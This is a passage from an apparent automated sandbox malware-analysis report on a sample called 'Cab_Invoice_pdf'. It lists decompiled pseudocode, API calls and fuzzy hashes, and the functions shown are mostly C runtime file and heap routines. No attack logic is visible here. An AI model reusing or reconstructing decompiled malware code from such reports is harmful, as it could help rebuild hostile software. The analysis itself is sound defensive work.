                            • GetLastError.KERNEL32(?,01321812,?), ref: 01321954
                            • __dosmaperr.LIBCMT ref: 0132197F
                            Similarity
                            • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                            • String ID:
                            • API String ID: 490808831-0
                            • Opcode ID: 29d2c630784377cf0ccebc878c102d6d304470df9d813f225e95b50307b17152
                            • Instruction ID: 7712a720c87032ec3d63ec1deb2b8941de7effacdfa71fff847beda122c05e30
                            • Opcode Fuzzy Hash: 29d2c630784377cf0ccebc878c102d6d304470df9d813f225e95b50307b17152
                            • Instruction Fuzzy Hash: E1016133B0423517DBBA323CA94477DAB4E8B8677CF250129ED09CB1C6DE65D88182D0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 86%
                            			E0132276E(void* __ecx, void* __eflags, signed int _a4, union _LARGE_INTEGER _a8, union _LARGE_INTEGER* _a12, intOrPtr _a16) {
                            				signed int _v8;
                            				void* _v12;
                            				void* _t15;
                            				int _t16;
                            				signed int _t19;
                            				signed int _t32;
                            				signed int _t33;
                            				signed int _t36;
                            
                            				_t36 = _a4;
                            				_push(_t32);
                            				_t15 = E0131E926(_t36);
                            				_t33 = _t32 | 0xffffffff;
                            				if(_t15 != _t33) {
                            					_push(_a16);
                            					_t16 = SetFilePointerEx(_t15, _a8, _a12,  &_v12); // executed
                            					if(_t16 != 0) {
                            						if((_v12 & _v8) == _t33) {
                            							goto L2;
                            						} else {
                            							_t19 = _v12;
                            							_t39 = (_t36 & 0x0000003f) * 0x30;
                            							 *( *((intOrPtr*)(0x1346108 + (_t36 >> 6) * 4)) + _t39 + 0x28) =  *( *((intOrPtr*)(0x1346108 + (_t36 >> 6) * 4)) + 0x28 + (_t36 & 0x0000003f) * 0x30) & 0x000000fd;
                            						}
                            					} else {
                            						E0131C998(GetLastError());
                            						goto L2;
                            					}
                            				} else {
                            					 *((intOrPtr*)(E0131C9CE())) = 9;
                            					L2:
                            					_t19 = _t33;
                            				}
                            				return _t19;
                            			}

                            APIs
                            • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,?,00000000,?,00000000,?,?,?,0132281D,?,00000000,00000002,00000000), ref: 013227A7
                            • GetLastError.KERNEL32(?,0132281D,?,00000000,00000002,00000000,?,01323143,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 013227B1
                            • __dosmaperr.LIBCMT ref: 013227B8
                            Similarity
                            • API ID: ErrorFileLastPointer__dosmaperr
                            • String ID:
                            • API String ID: 2336955059-0
                            • Opcode ID: 02afdac78791472bed70760892371673686be6b007f06494764c2f287149006d
                            • Instruction ID: 5088f0b0bf909b83912d538d01cba551c42da1468600141f4c559c53e6c25e06
                            • Opcode Fuzzy Hash: 02afdac78791472bed70760892371673686be6b007f06494764c2f287149006d
                            • Instruction Fuzzy Hash: 3E01F037614519ABCF159F6DDC048AF7B1EDB85334F140255F8119B185EB71DD4187D0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 62%
                            			E0131CA68(WCHAR* _a4, void* _a8) {
                            				void* _v8;
                            				void _v56;
                            				void* __edi;
                            				signed int _t17;
                            				void* _t18;
                            				signed int _t19;
                            				signed int _t20;
                            				intOrPtr* _t25;
                            				signed int _t26;
                            				signed int _t34;
                            				signed int _t36;
                            				void* _t39;
                            				signed int _t42;
                            				signed int _t44;
                            				void* _t45;
                            				WCHAR* _t49;
                            				void* _t56;
                            				intOrPtr _t59;
                            				void* _t60;
                            				void* _t62;
                            
                            				if(_a8 != 0) {
                            					_push(_t45);
                            					_t34 = 0;
                            					E01318520(_t45,  &_v56, 0, 0x30);
                            					_t36 = 0xc;
                            					memcpy(_a8,  &_v56, _t36 << 2);
                            					_t62 = _t60 + 0x18;
                            					_t49 = _a4;
                            					__eflags = _t49;
                            					if(_t49 != 0) {
                            						_t17 = E01325190(_t49, L"?*");
                            						_pop(_t39);
                            						__eflags = _t17;
                            						if(_t17 == 0) {
                            							_t18 = CreateFileW(_t49, 0x80, 7, 0, 3, 0x2000000, 0); // executed
                            							_push(_a8);
                            							_t56 = _t18;
                            							_v8 = _t56;
                            							__eflags = _t56 - 0xffffffff;
                            							if(__eflags == 0) {
                            								_push(_t49);
                            								_t19 = E0131CB6F(_t39, _t44, _t49, __eflags);
                            							} else {
                            								_push(_t56);
                            								_push(0xffffffff);
                            								_push(_t49); // executed
                            								_t19 = E0131CBFB(_t44); // executed
                            								_t62 = _t62 + 0x10;
                            							}
                            							__eflags = _t19;
                            							if(_t19 == 0) {
                            								E01318520(_t49,  &_v56, _t34, 0x30);
                            								_t34 = _t34 | 0xffffffff;
                            								__eflags = _t34;
                            								_t42 = 0xc;
                            								memcpy(_a8,  &_v56, _t42 << 2);
                            								_t56 = _v8;
                            							}
                            							__eflags = _t56 - 0xffffffff;
                            							if(_t56 != 0xffffffff) {
                            								CloseHandle(_t56);
                            							}
                            							_t20 = _t34;
                            							L15:
                            							return _t20;
                            						}
                            						_t25 = E0131C9CE();
                            						_t59 = 2;
                            						 *_t25 = _t59;
                            						_t26 = E0131C9BB();
                            						 *_t26 = _t59;
                            						L6:
                            						_t20 = _t26 | 0xffffffff;
                            						goto L15;
                            					}
                            					 *(E0131C9BB()) = 0;
                            					 *((intOrPtr*)(E0131C9CE())) = 0x16;
                            					_t26 = E01321788();
                            					goto L6;
                            				}
                            				 *(E0131C9BB()) =  *_t29 & 0x00000000;
                            				 *((intOrPtr*)(E0131C9CE())) = 0x16;
                            				return E01321788() | 0xffffffff;
                            			}

                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0b3d22fc2818e1b9c7d8198c823d1ea9e7bcc9a25d3c53b52a694d48b765a87d
                            • Instruction ID: 4e60c5844f1bc9349a7417f8750659f42c954b4913d449276790f675b670589d
                            • Opcode Fuzzy Hash: 0b3d22fc2818e1b9c7d8198c823d1ea9e7bcc9a25d3c53b52a694d48b765a87d
                            • Instruction Fuzzy Hash: 4331FB72880219BAEB297B6CDC41FAE372DEF4273CF105215F9646B1C4DB705D01D6A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 63%
                            			E013113D0(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
                            				signed int _v4;
                            				void* _v8;
                            				char _v92;
                            				void* _v100;
                            				char _v104;
                            				signed int _t12;
                            				signed int _t14;
                            				void* _t17;
                            				void* _t21;
                            				intOrPtr* _t31;
                            				char* _t35;
                            				signed int _t42;
                            				void* _t43;
                            
                            				_t42 =  &_v100;
                            				_t12 =  *0x133c008; // 0xa212446c
                            				_v4 = _t12 ^ _t42;
                            				_t31 = _a4;
                            				_t35 =  &_v92;
                            				_t21 = _a8 + 0xffffffa0;
                            				_t14 = E01319F16(__edx,  *_t31, _t21, 0); // executed
                            				_t43 = _t42 + 0xc;
                            				if(_t14 != 0) {
                            					L5:
                            					E0131786A();
                            					return _t14 | 0xffffffff;
                            				} else {
                            					_t14 = E01319B2B( &_v100, 0x60, 1,  *_t31); // executed
                            					_t43 = _t43 + 0x10;
                            					if(_t14 < 1) {
                            						goto L5;
                            					} else {
                            						while(1) {
                            							_t17 = E01319780(0x1330340, _t35, 8);
                            							_t43 = _t43 + 0xc;
                            							if(_t17 == 0) {
                            								break;
                            							}
                            							_t35 = _t35 - 1;
                            							_t14 =  &_v100;
                            							if(_t35 >= _t14) {
                            								continue;
                            							} else {
                            								goto L5;
                            							}
                            							goto L7;
                            						}
                            						asm("movups xmm0, [esi]");
                            						asm("movups [edi+0x10], xmm0");
                            						asm("movups xmm0, [esi+0x10]");
                            						asm("movups [edi+0x20], xmm0");
                            						asm("movups xmm0, [esi+0x20]");
                            						asm("movups [edi+0x30], xmm0");
                            						asm("movups xmm0, [esi+0x30]");
                            						asm("movups [edi+0x40], xmm0");
                            						asm("movups xmm0, [esi+0x40]");
                            						asm("movups [edi+0x50], xmm0");
                            						asm("movq xmm0, [esi+0x50]");
                            						asm("movq [edi+0x60], xmm0");
                            						_push( *((intOrPtr*)(_t31 + 0x18)));
                            						L01317864();
                            						 *((intOrPtr*)(_t31 + 4)) = _t35 -  &_v104 + _t21 - _t17 + 0x58;
                            						E0131786A();
                            						return 0;
                            					}
                            				}
                            				L7:
                            			}

                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: __fread_nolockhtonl
                            • String ID:
                            • API String ID: 822407656-0
                            • Opcode ID: 012f51b5b7b31a088673919ea0ca95313ad4acad09730e1f68a6e2fa3f4b8288
                            • Instruction ID: 556056ec954d51a1965f5073cb3e38887b137cc2307528d74eb4faed9977456f
                            • Opcode Fuzzy Hash: 012f51b5b7b31a088673919ea0ca95313ad4acad09730e1f68a6e2fa3f4b8288
                            • Instruction Fuzzy Hash: CF212632E04B42A7D3249B3CCC016A6F3A0FFA8218F849B19FE9862545FB21F5D4C381
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 93%
                            			E01319FC9(signed int __edx, intOrPtr* _a4) {
                            				char _v5;
                            				signed int _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				signed int _t64;
                            				signed int _t66;
                            				signed char _t68;
                            				signed int _t70;
                            				signed char _t77;
                            				intOrPtr* _t78;
                            				signed int _t79;
                            				signed char _t80;
                            				intOrPtr _t82;
                            				intOrPtr _t83;
                            				signed int _t90;
                            				intOrPtr _t93;
                            				signed int _t94;
                            				intOrPtr* _t95;
                            				signed char _t96;
                            				signed int _t99;
                            				signed int _t100;
                            				signed int _t103;
                            				signed int _t109;
                            				signed int _t111;
                            				signed int _t113;
                            				signed int _t114;
                            				signed int _t115;
                            				signed int _t118;
                            				signed int _t120;
                            
                            				_t104 = __edx;
                            				if(_a4 != 0) {
                            					_t64 = E013209C5(_a4);
                            					_t93 = _a4;
                            					_t118 = _t64;
                            					__eflags =  *(_t93 + 8);
                            					if( *(_t93 + 8) < 0) {
                            						 *(_t93 + 8) = 0;
                            					}
                            					_t66 = E013227EC(_t118, 0, 0, 1); // executed
                            					_t90 = _t104;
                            					_t109 = _t66;
                            					_v12 = _t109;
                            					__eflags = _t90;
                            					if(__eflags > 0) {
                            						L7:
                            						_t68 =  *(_a4 + 0xc);
                            						__eflags = _t68 & 0x000000c0;
                            						if((_t68 & 0x000000c0) != 0) {
                            							_t70 = _t118 >> 6;
                            							_t94 = (_t118 & 0x0000003f) * 0x30;
                            							_v16 = _t70;
                            							_v20 = _t94;
                            							_t95 = _a4;
                            							_v5 =  *((intOrPtr*)(_t94 +  *((intOrPtr*)(0x1346108 + _t70 * 4)) + 0x29));
                            							_t96 =  *(_t95 + 0xc);
                            							asm("cdq");
                            							_t120 =  *_t95 -  *((intOrPtr*)(_t95 + 4));
                            							__eflags = _t96 & 0x00000003;
                            							if((_t96 & 0x00000003) == 0) {
                            								_t77 =  *(_a4 + 0xc) >> 2;
                            								__eflags = _t77 & 0x00000001;
                            								if((_t77 & 0x00000001) != 0) {
                            									L23:
                            									_t78 = _a4;
                            									L24:
                            									__eflags = _t109 | _t90;
                            									if((_t109 | _t90) == 0) {
                            										L30:
                            										_t79 = _t120;
                            										goto L31;
                            									}
                            									_t80 =  *(_t78 + 0xc);
                            									__eflags = _t80 & 0x00000001;
                            									if((_t80 & 0x00000001) == 0) {
                            										__eflags = _v5 - 1;
                            										if(_v5 == 1) {
                            											_t120 = E01317AE0(_t120, _t104, 2, 0);
                            										}
                            										_t120 = _t120 + _t109;
                            										asm("adc edx, ebx");
                            										goto L30;
                            									}
                            									_t79 = E0131A15E(_a4, _t109, _t90, _t120, _t104);
                            									goto L31;
                            								}
                            								_t66 = E0131C9CE();
                            								 *_t66 = 0x16;
                            								goto L22;
                            							}
                            							__eflags = _v5 - 1;
                            							_t99 = _v16;
                            							if(_v5 != 1) {
                            								L13:
                            								_t82 =  *((intOrPtr*)(0x1346108 + _t99 * 4));
                            								_t100 = _v20;
                            								__eflags =  *(_t100 + _t82 + 0x28) & 0x00000080;
                            								if(( *(_t100 + _t82 + 0x28) & 0x00000080) == 0) {
                            									goto L23;
                            								}
                            								_t78 = _a4;
                            								_v20 = _v20 & 0x00000000;
                            								_t111 =  *(_t78 + 4);
                            								__eflags =  *_t78 - _t111;
                            								asm("sbb edi, edi");
                            								_t113 =  !_t111 &  *_t78 -  *(_t78 + 4);
                            								__eflags = _t113;
                            								_v16 = _t113;
                            								_t109 = _v12;
                            								if(_t113 == 0) {
                            									goto L24;
                            								}
                            								_t103 =  *(_t78 + 4);
                            								_t114 = _v20;
                            								do {
                            									__eflags =  *_t103 - 0xa;
                            									if( *_t103 == 0xa) {
                            										_t120 = _t120 + 1;
                            										asm("adc edx, 0x0");
                            									}
                            									_t103 = _t103 + 1;
                            									_t114 = _t114 + 1;
                            									__eflags = _t114 - _v16;
                            								} while (_t114 != _v16);
                            								_t109 = _v12;
                            								goto L24;
                            							}
                            							_t115 = _v20;
                            							_t83 =  *((intOrPtr*)(0x1346108 + _t99 * 4));
                            							__eflags =  *(_t115 + _t83 + 0x2d) & 0x00000002;
                            							_t109 = _v12;
                            							if(( *(_t115 + _t83 + 0x2d) & 0x00000002) == 0) {
                            								goto L13;
                            							}
                            							_t79 = E0131A2E2(_a4, _t109, _t90);
                            							goto L31;
                            						}
                            						asm("cdq");
                            						_t79 = _t109 -  *((intOrPtr*)(_a4 + 8));
                            						asm("sbb ebx, edx");
                            						goto L31;
                            					} else {
                            						if(__eflags < 0) {
                            							L22:
                            							_t79 = _t66 | 0xffffffff;
                            							L31:
                            							return _t79;
                            						}
                            						__eflags = _t109;
                            						if(_t109 < 0) {
                            							goto L22;
                            						}
                            						goto L7;
                            					}
                            				}
                            				 *((intOrPtr*)(E0131C9CE())) = 0x16;
                            				return E01321788() | 0xffffffff;
                            			}

                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d838d643febb89b03841e44df8c39f16b9e227640df57acd32282dbe1a41e9df
                            • Instruction ID: 19d753185263835852b7fc9df9abc2640a1bb960ff59ec1e98b16808e132f909
                            • Opcode Fuzzy Hash: d838d643febb89b03841e44df8c39f16b9e227640df57acd32282dbe1a41e9df
                            • Instruction Fuzzy Hash: 05510B71A01248AFDB19DF2CCC40AA97BF5EF853A9F198168E8099B355C731ED42C750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 72%
                            			E01325E01(void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed short* _a8, intOrPtr _a12, intOrPtr* _a16) {
                            				char _v8;
                            				char _v12;
                            				void* _v16;
                            				intOrPtr _v20;
                            				char _v32;
                            				void* _t25;
                            
                            				E01325BBD( &_v32, _a8);
                            				asm("movsd");
                            				asm("movsd");
                            				asm("movsd");
                            				if(_v12 != 0) {
                            					_t25 = E0132C048( &_v8, _a4, _v20, _a12, 0x180); // executed
                            					if(_t25 != 0) {
                            						goto L1;
                            					}
                            					 *0x1345e8c =  *0x1345e8c + 1;
                            					asm("lock or [eax], ecx");
                            					 *((intOrPtr*)(_a16 + 8)) = 0;
                            					 *((intOrPtr*)(_a16 + 0x1c)) = 0;
                            					 *((intOrPtr*)(_a16 + 4)) = 0;
                            					 *_a16 = 0;
                            					 *((intOrPtr*)(_a16 + 0x10)) = _v8;
                            					return _a16;
                            				}
                            				L1:
                            				return 0;
                            			}

                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: __wsopen_s
                            • String ID:
                            • API String ID: 3347428461-0
                            • Opcode ID: d5024f25d73ea64be4faa1c076f9b9f3da70eb7fae0c75ad0b7c775018cf772a
                            • Instruction ID: 0dc0c3045d7827aa792239f99289e8a13b79d448bc255385b7e007941630f2f9
                            • Opcode Fuzzy Hash: d5024f25d73ea64be4faa1c076f9b9f3da70eb7fae0c75ad0b7c775018cf772a
                            • Instruction Fuzzy Hash: 8311187590410AAFCF15DF58E9409DF7BF8EF49314F008499F808EB311D671EA258BA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 91%
                            			E0131E562(void* __esi, void* __eflags) {
                            				intOrPtr _v12;
                            				void* __ecx;
                            				char _t16;
                            				void* _t17;
                            				void* _t26;
                            				void* _t28;
                            				void* _t30;
                            				char _t31;
                            				void* _t33;
                            				intOrPtr* _t35;
                            
                            				_push(_t26);
                            				_push(_t26);
                            				_t16 = E01320B10(_t26, 0x40, 0x30); // executed
                            				_t31 = _t16;
                            				_v12 = _t31;
                            				_t28 = _t30;
                            				if(_t31 != 0) {
                            					_t2 = _t31 + 0xc00; // 0xc00
                            					_t17 = _t2;
                            					__eflags = _t31 - _t17;
                            					if(__eflags != 0) {
                            						_t3 = _t31 + 0x20; // 0x20
                            						_t35 = _t3;
                            						_t33 = _t17;
                            						do {
                            							_t4 = _t35 - 0x20; // 0x0
                            							E0132391E(_t28, __eflags, _t4, 0xfa0, 0);
                            							 *(_t35 - 8) =  *(_t35 - 8) | 0xffffffff;
                            							 *_t35 = 0;
                            							_t35 = _t35 + 0x30;
                            							 *((intOrPtr*)(_t35 - 0x2c)) = 0;
                            							 *((intOrPtr*)(_t35 - 0x28)) = 0xa0a0000;
                            							 *((char*)(_t35 - 0x24)) = 0xa;
                            							 *(_t35 - 0x23) =  *(_t35 - 0x23) & 0x000000f8;
                            							 *((char*)(_t35 - 0x22)) = 0;
                            							__eflags = _t35 - 0x20 - _t33;
                            						} while (__eflags != 0);
                            						_t31 = _v12;
                            					}
                            				} else {
                            					_t31 = 0;
                            				}
                            				E013209EB(0);
                            				return _t31;
                            			}














                            APIs
                              • Part of subcall function 01320B10: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,01324453,00000001,00000364,?,0131A8EB,?,?,00000000), ref: 01320B51
                            • _free.LIBCMT ref: 0131E5CE
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: AllocateHeap_free
                            • String ID:
                            • API String ID: 614378929-0
                            • Opcode ID: 96c3009d7deeecd5dc0a4f2725f353eb7d2c4963f0acba3011afd32d76aa04d2
                            • Instruction ID: 1260301cddfefd716b2fe5d24ca79de2d88777d5806f159145817eb7e8bfaeb1
                            • Opcode Fuzzy Hash: 96c3009d7deeecd5dc0a4f2725f353eb7d2c4963f0acba3011afd32d76aa04d2
                            • Instruction Fuzzy Hash: 3101F972200309ABE3369F69D841E5AFBEDFB89274F25052DE58593280FA71E905C774
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 92%
                            			E01319813(void* __ecx, intOrPtr _a4) {
                            				void* _t16;
                            				void* _t24;
                            				signed int _t25;
                            				signed int _t26;
                            				intOrPtr _t28;
                            
                            				_t28 = _a4;
                            				if(_t28 == 0) {
                            					 *((intOrPtr*)(E0131C9CE())) = 0x16;
                            					return E01321788() | 0xffffffff;
                            				}
                            				_push(_t25);
                            				_t26 = _t25 | 0xffffffff;
                            				if(( *(_t28 + 0xc) >> 0x0000000d & 0x00000001) != 0) {
                            					_t26 = E0131DA31(_t24, _t28);
                            					E01321AED(_t28);
                            					_t16 = E01321875(E013209C5(_t28)); // executed
                            					if(_t16 >= 0) {
                            						if( *(_t28 + 0x1c) != 0) {
                            							E013209EB( *(_t28 + 0x1c));
                            							 *(_t28 + 0x1c) =  *(_t28 + 0x1c) & 0x00000000;
                            						}
                            					} else {
                            						_t26 = _t26 | 0xffffffff;
                            					}
                            				}
                            				E013219EF(_t28);
                            				return _t26;
                            			}









                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 72a8c654f6fac3ccc1ce1d9488a34fdefc3d72a290b71712b2914838413e8dd8
                            • Instruction ID: d09deeb620f9691d5acdb34e730c969156edfb58e51801daa8d62f24ce57ad41
                            • Opcode Fuzzy Hash: 72a8c654f6fac3ccc1ce1d9488a34fdefc3d72a290b71712b2914838413e8dd8
                            • Instruction Fuzzy Hash: DDF0F432901634A7EA39366D9C04B5B3A988F9233CF000725ED25931D4DA70D80287E1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 95%
                            			E01320B10(void* __ecx, signed int _a4, signed int _a8) {
                            				void* _t8;
                            				void* _t12;
                            				signed int _t13;
                            				void* _t15;
                            				signed int _t18;
                            				long _t19;
                            
                            				_t15 = __ecx;
                            				_t18 = _a4;
                            				if(_t18 == 0) {
                            					L2:
                            					_t19 = _t18 * _a8;
                            					if(_t19 == 0) {
                            						_t19 = _t19 + 1;
                            					}
                            					while(1) {
                            						_t8 = RtlAllocateHeap( *0x134655c, 8, _t19); // executed
                            						if(_t8 != 0) {
                            							break;
                            						}
                            						__eflags = E01320397();
                            						if(__eflags == 0) {
                            							L8:
                            							 *((intOrPtr*)(E0131C9CE())) = 0xc;
                            							__eflags = 0;
                            							return 0;
                            						}
                            						_t12 = E01328686(_t15, __eflags, _t19);
                            						_pop(_t15);
                            						__eflags = _t12;
                            						if(_t12 == 0) {
                            							goto L8;
                            						}
                            					}
                            					return _t8;
                            				}
                            				_t13 = 0xffffffe0;
                            				if(_t13 / _t18 < _a8) {
                            					goto L8;
                            				}
                            				goto L2;
                            			}










                            APIs
                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,01324453,00000001,00000364,?,0131A8EB,?,?,00000000), ref: 01320B51
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 47302dfb18cb09dba0589ace1cbd97a813322edf403d1c6ee795f274ad199083
                            • Instruction ID: 68a61ba8f32d1bf29f36f3f9dd856af59d524d176bf1f703f135285cdc8536a5
                            • Opcode Fuzzy Hash: 47302dfb18cb09dba0589ace1cbd97a813322edf403d1c6ee795f274ad199083
                            • Instruction Fuzzy Hash: 72F0B431501139A7EB393E6D9804F5A7F88AB427BCF144161FA0897184CA20D40886E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 76%
                            			E01328DC7(void* __ecx, void* __eflags, intOrPtr* _a4) {
                            				intOrPtr _t12;
                            				intOrPtr _t16;
                            				intOrPtr* _t26;
                            
                            				 *0x1345e8c =  *0x1345e8c + 1;
                            				_t26 = _a4;
                            				_t12 = E01320A25(__ecx, 0x1000); // executed
                            				 *((intOrPtr*)(_t26 + 4)) = _t12;
                            				E013209EB(0);
                            				if( *((intOrPtr*)(_t26 + 4)) == 0) {
                            					asm("lock or [eax], ecx");
                            					 *((intOrPtr*)(_t26 + 0x18)) = 2;
                            					 *((intOrPtr*)(_t26 + 4)) = _t26 + 0x14;
                            				} else {
                            					_push(0x40);
                            					asm("lock or [eax], ecx");
                            					 *((intOrPtr*)(_t26 + 0x18)) = 0x1000;
                            				}
                            				_t16 =  *((intOrPtr*)(_t26 + 4));
                            				 *(_t26 + 8) =  *(_t26 + 8) & 0x00000000;
                            				 *_t26 = _t16;
                            				return _t16;
                            			}







                            APIs
                              • Part of subcall function 01320A25: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,013280E5,00000000,?,01320C3C,?,00000008,?,01323E2E,?,?,?), ref: 01320A57
                            • _free.LIBCMT ref: 01328DE7
                              • Part of subcall function 013209EB: RtlFreeHeap.NTDLL(00000000,00000000,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?), ref: 01320A01
                              • Part of subcall function 013209EB: GetLastError.KERNEL32(?,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?,?), ref: 01320A13
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Heap$AllocateErrorFreeLast_free
                            • String ID:
                            • API String ID: 314386986-0
                            • Opcode ID: 98f270e8ea80808b1f9e81bac9120a4326dbef03aac197e3923dd7d86866f0f8
                            • Instruction ID: 5f8a043a308e9c31cfcb5d94d8418bf533cafd92221ef6cfa35b1fdaaa5281e7
                            • Opcode Fuzzy Hash: 98f270e8ea80808b1f9e81bac9120a4326dbef03aac197e3923dd7d86866f0f8
                            • Instruction Fuzzy Hash: 0DF062710057048FE3349F15D841B52B7F8EB04719F10882EE69E97A91DBB4B844CBD4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 94%
                            			E01320A25(void* __ecx, long _a4) {
                            				void* _t4;
                            				void* _t6;
